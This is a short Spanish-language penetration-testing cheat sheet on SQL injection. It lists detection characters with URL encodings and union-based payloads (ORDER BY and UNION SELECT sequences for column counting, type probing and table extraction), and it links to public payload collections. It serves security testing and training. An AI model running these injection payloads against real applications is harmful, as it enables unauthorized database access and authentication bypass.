Web Application Penetration Testing

SQL injection (SQLi)

Identificación SQLi

https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/sql-injection/common-sqli-payloads.txt

Payload

URL Encoded

'

%27

"

%22

#

%23

;

%3B

)

%29

Authentication bypass

https://github.com/MrW0l05zyn/pentesting/blob/master/sql-injection/sql-injection-authentication-bypass.txt

Union-based SQLi

Determinar el número de columnas

ORDER BY 1-- -
ORDER BY 2-- -
ORDER BY 3-- -

UNION SELECT NULL-- -
UNION SELECT NULL,NULL-- -
UNION SELECT NULL,NULL,NULL-- -

Determinar el tipo de dato de cada columna

UNION SELECT 'a',NULL,NULL-- -
UNION SELECT NULL,'a',NULL-- -
UNION SELECT NULL,NULL,'a'-- -

Obtener información

UNION SELECT columna1, columna2, columna3 FROM tabla1-- -
UNION ALL SELECT columna1, columna2, columna3 FROM tabla1-- -

Payloads

FuzzDB

https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/detect

Payload Box

https://github.com/payloadbox/sql-injection-payload-list

Payloads All The Things

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection

AnteriorCommand injection SiguienteMySQL / MariaDB

Última actualización hace 1 año